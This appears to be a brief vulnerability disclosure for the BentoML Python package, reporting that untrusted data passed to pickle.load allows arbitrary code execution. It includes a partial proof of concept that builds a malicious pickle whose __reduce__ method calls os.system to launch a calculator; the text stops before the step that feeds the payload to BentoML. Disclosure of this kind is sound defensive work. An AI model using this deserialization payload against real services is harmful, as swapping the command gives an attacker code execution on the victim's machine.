vulnerability arbitrary code execution
severity 3.8
language python
registry pypi


BentoML is a framework for serving, managing, and deploying machine learning models. It is aiming to bridge the gap between Data Science and DevOps, and enable teams to deliver prediction services in a fast, repeatable, and scalable way.

  • Vulnerability discription untrusded loading of data by the picle.load function leading to Arbitrary code execution.

Proof of Concept

  1. run
import os
import pickle
os.system('pip install bentoml')
from bentoml.marshal.utils import PickleDataLoader
#payload formation
class ArbitrarcyCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
#serilizing payload
dumps = pickle.dumps(ArbitrarcyCode())
#exploiting bentoml